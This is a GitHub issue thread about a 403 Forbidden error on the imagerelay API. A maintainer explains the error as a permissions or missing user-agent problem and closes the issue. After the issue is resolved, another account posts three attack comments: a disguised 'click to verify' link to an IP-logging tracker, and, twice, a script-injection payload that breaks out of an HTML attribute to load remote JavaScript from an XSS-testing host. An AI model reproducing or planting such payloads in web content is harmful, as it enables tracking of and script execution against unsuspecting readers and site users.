### ISSUE TITLE
imagerelay | API access

### ISSUE THREAD

**Issue by gyanendra-bot1** [imagerelay/API#30]
Dear Sir,

I am getting 403 Forbidden issue while accessing the API. Could you please look into this and share your thoughts.

End point URL: https://api.imagerelay.com/api/v2/folders.json
Username: Infopro
User Agent: MyApp (https://eacstills.imagerelay.com)

**Comment by justinperkins** [comment]
Hi @gyanendra-bot1, the 403 in this case means you don't have "edit" permissions for folders (catalogs). I see that your role is a "limited admin", which tells me you don't have complete admin access to all folders. This type of permission level will present a variety of problems for API access. Please reach out to your library administrator (or contact support@imagerelay.com) to resolve the issue.

**Comment by justinperkins** [comment]
@gyanendra-bot1 have you resolved your issue? We've recently made some improvements to the API documentation to better explain error status codes you may encounter. A 403 can also mean you have a missing user-agent header. 

See here for more help: https://github.com/imagerelay/API#status-code-explanations

Please let us know how we can assist.

**Comment by justinperkins** [comment]
Considering this issue resolved.

**Comment by taniyaagrawal** [comment]
<a href="https://iplogger.org/1ETPu7">click to verify</a>

**Comment by taniyaagrawal** [comment]
"><script src=https://againtest.xss.ht></script>

**Comment by taniyaagrawal** [comment]
`"><script src=https://againtest.xss.ht></script>`
